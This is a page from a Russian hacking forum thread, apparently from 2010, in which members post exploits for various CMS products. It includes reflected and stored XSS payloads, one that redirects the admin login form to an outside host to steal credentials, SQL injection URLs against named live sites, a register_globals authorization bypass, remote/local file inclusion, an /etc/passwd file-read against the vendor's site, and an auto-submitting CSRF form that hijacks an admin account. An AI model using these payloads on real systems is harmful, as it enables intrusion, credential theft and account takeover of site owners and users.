ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #381  
Старый 28.04.2010, 17:36
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

Concrete CMS

-Пассивная XSS


Код:
http://www.concrete5.org/search/-/search/?query=%3E%22%3Cscript%3Ealert%28%27xss%27%29%3C%2Fscript%3E&submit=Go+%BB

******************

оффсайт:
http://www.concrete5.org/
скачать:
http://www.concrete5.org/download_file/-/view/12742/
 
Ответить с цитированием

  #382  
Старый 29.04.2010, 05:20
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Tribiq CMS 5.2.2b

Пассивная XSS:
Цитата:
/admin/adminlogin.php?desturl=%22%3E%3Cscript%3Ealert();% 3C/script%3E
Мутим чётко и дезрко (c):
Need: mg=off, хотя х.з., js такая весчь что можно и без кавычек обойтись.
Цитата:
/admin/adminlogin.php?desturl=%22%3E%3CSCRIPT%3Edocument. forms[0].action='http://xenk/index.php';%3C/script%3E
До изменения:
Цитата:
<form action="adminlogin.php" method="POST" name="f">

После изменения:
Цитата:
<form action="http://xenk/index.php" method="POST" name="f">
Админ вводит пасс/логин, и данные идут не в adminlogin.php, а в http://xenk/index.php.
 
Ответить с цитированием

  #383  
Старый 29.04.2010, 08:05
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

v.1.0 RyShell CMS

SQL Injection
пример сайта с этой кмс
Код:
http://www.papiorec.org/index.php?url=-8+union+select+unhex%28hex%28version%28%29%29%29--
на офф сайте тоже имеется SQL Injection:
Код:
http://www.ryshell.com/index2.php?url=-25+UNiON+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,unhex%28hex%28version%28%29%29%29,18,19,20,21--
хотя в админку можно попасть минуя авторизацию
http://www.ryshell.com/admin/admin.php
 
Ответить с цитированием

  #384  
Старый 29.04.2010, 18:39
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

ecoCMS
Site: www.ecocms.com
Vulnerability: Authorization bypass
Severity: High
Needs: register_globals=On
Exploit: /admin.php?_SESSION[user_in]=1
Reason: В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль:
PHP код:
<?php

/*
ecoCMS - Quick & easy to use Content Management System (CMS)
(c)2009 by ecoCMS.com - visit for PRO version.
*/

include('config.php');
if(
$_GET['panel']=='logout')session_destroy();

if(
$_POST['user'] && $_POST['pass']){
// user is trying to login here.
// verify his user/pass.
if($_POST['user']==constant('accessUser') && $_POST['pass']==constant('accessPass'))
$_SESSION['user_in']=1;
else
$Message 'Username or password incorrect!';
}

if(!
$_SESSION['user_in'])$HideContents=1;
else unset(
$HideContents);

?>
В admin.php переменная сессии $_SESSION['user_in'] определяется лишь если переданы неправильный логин и пароль. Следовательно. мы можем не передавая post-данные с логином и паролем, установить значение переменной сессии при register_globals=On.

Последний раз редактировалось shell_c0de; 06.05.2010 в 18:17..
 
Ответить с цитированием

  #385  
Старый 02.05.2010, 19:23
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

ISPmanager 4.3 Professional

Пассивная XSS:
Цитата:
/ispmgr?func=%3C/script%3E%22%3E%3Cscript%3Ealert();%3C/script%3E

Последний раз редактировалось Ctacok; 21.05.2010 в 18:31..
 
Ответить с цитированием

  #386  
Старый 06.05.2010, 16:48
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

Campsite (3.3.5)
Site: campsite.campware.org
Vulnerability: Remote File Inclusion || Local File Inclusion
Severity: High
Needs: register_globals=On
Exploit: /tests/test_autopublish.php?GLOBALS[g_campsiteDir]=RFI ; /classes/ObjectType.php?GLOBALS[g_campsiteDir]=RFI
Reason: В tests/test_autopublish.php, /classes/ObjectType.php и в других скриптах часто используемая глобальная переменная g_campsiteDir не определена. Она определена лишь в скрипте set_path.php, который в самом вышеуказанном скрипте не подключается.
Участок кода в tests/test_autopublish.php:
PHP код:
<?php
require_once($GLOBALS['g_campsiteDir']."/classes/Article.php");
require_once(
$GLOBALS['g_campsiteDir']."/classes/ArticlePublish.php");
require_once(
$GLOBALS['g_campsiteDir']."/classes/Issue.php");
require_once(
$GLOBALS['g_campsiteDir']."/classes/IssuePublish.php");
...
Участок кода в /classes/ObjectType.php:
PHP код:
<?php
/**
 * @package Campsite
 */

/**
 * Includes
 */
require_once($GLOBALS['g_campsiteDir'].'/classes/DatabaseObject.php');
require_once(
$GLOBALS['g_campsiteDir'].'/classes/Translation.php');
Следовательно. мы можем установить значение глобальной переменной и заинклудить произвольный файл при register_globals=On.
При allow_url_include=On/Off имеем RFI/LFI соответственно. Для проведения LFI скорее всего понадобится ещё и magic_quotes_gpc=On для того, чтобы обрезать лишнее нулл-байтом.
При register_globals=Off имеем лишь раскрытие путей.
 
Ответить с цитированием

  #387  
Старый 06.05.2010, 16:53
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

//Вдогонку к #391
ecoCMS
Site: www.ecocms.com
Vulnerability: XSS
Severity: Low
Needs: -
Exploit: /admin.php?p=%3Cscript%3Ealert()%3C/script%3E
Reason: get-параметр p в admin.php недостаточно фильтруется. Код приводить смысла не вижу)
 
Ответить с цитированием

  #388  
Старый 06.05.2010, 18:49
Аватар для shell_c0de
shell_c0de
Reservists Of Antichat - Level 6
Регистрация: 07.07.2009
Сообщений: 324
Провел на форуме:
1585404

Репутация: 564
Отправить сообщение для shell_c0de с помощью ICQ Отправить сообщение для shell_c0de с помощью AIM
По умолчанию

DynPage
Site: www.dynpage.net
Vulnerability: Arbitrary files content disclosing
Severity: High
Needs: -
Exploit: /content/dynpage_load.php?file=/etc/passwd
Reason: Файл /content/dynpage_load.php не защищён от прямого просмотра. То есть в других местах, где собственно идёт вывод контента с помощью этого скрипта есть какая-то фильтрация, а здесь без никаких ограничений имеем читалку.
Уязвимый код /content/dynpage_load.php:
PHP код:
...
$filename $_GET["file"]; 
if (!
is_dir ($filename) && file_exists ($filename)) { 
  
 
$bytes filesize ($filename); 
 
$fh fopen($filename'r'); 
 print (
fread ($fh$bytes)); 
 
fclose ($fh); 
 

else 
 print (
"DynPage file not found: ".htmlspecialchars ($filename)."");
 
?> 
Example: на официальном сайте: http://www.dynpage.net/dynpage/content/dynpage_load.php?file=/etc/passwd

Последний раз редактировалось shell_c0de; 06.05.2010 в 18:54..
 
Ответить с цитированием

  #389  
Старый 07.05.2010, 11:16
Аватар для winlogon.exe
winlogon.exe
Участник форума
Регистрация: 05.06.2009
Сообщений: 225
Провел на форуме:
2793173

Репутация: 297
Отправить сообщение для winlogon.exe с помощью ICQ
По умолчанию

Rezervi 3.0.2
Произвольный PHP сценарий
Код:
/include/mail.inc.php?root=[file]
download: http://www.rezervi.com/downloads/rezervi3_0_2.zip
 
Ответить с цитированием

  #390  
Старый 09.05.2010, 14:20
Аватар для Ctacok
Ctacok
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696

Репутация: 2221


По умолчанию

Social Engine v 3.18

Активная XSS:

/profile.php?user=victim
Переходим на вкладку Comments.
Цитата:
<a href='jav ascript:alert();'>xek</a>
/profile.php?user=victim

Переходим на вкладку Comments.

Цитата:
<IMG src="jav ascript:alert()"></img>
Активная XSS:

/user_editprofile_style.php

Код HTML:
body{

background-image: url('javascript:alert()');

}
CSRF:

Код HTML:
<div style='display:none'>
<form action='http://localhost/se/admin/admin_viewusers_edit.php' method='post' name='xeker'>
<input type='text' class='text' name='user_email' value='milo@mail.com' size='30' maxlength='70'>
<input type='text' class='text' name='user_username' value='Ctacok' size='30' maxlength='50'>
<input type='password' class='text' name='user_password' value='' size='30' maxlength='50'>
<select class='text' name='user_enabled'><option value='0'>Disabled</option>
<select class='text' name='user_level_id'><option value='1' SELECTED>Default Level</option>
<select class='text' name='user_profilecat_id'><option value='1' SELECTED>Standard Users</option>
<input type='text' class='text' name='user_invitesleft' value='5' maxlength='3' size='2'>
<input type='submit' class='button' value='Save Changes'>
<input type='hidden' name='task' value='edituser'>
<input type='hidden' name='user_id' value='1'>
<input type='hidden' name='s' value='id'>
<input type='hidden' name='p' value='1'>
<input type='hidden' name='f_user' value=''>
<input type='hidden' name='f_email' value=''><input type='hidden' name='f_level' value=''>
<input type='hidden' name='f_subnet' value=''>
<input type='hidden' name='f_enabled' value=''>
</form>
</div>

<script language="JavaScript" type="text/javascript"> 
document.xeker.submit(); 
</script>

Последний раз редактировалось Ctacok; 14.06.2010 в 19:29..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ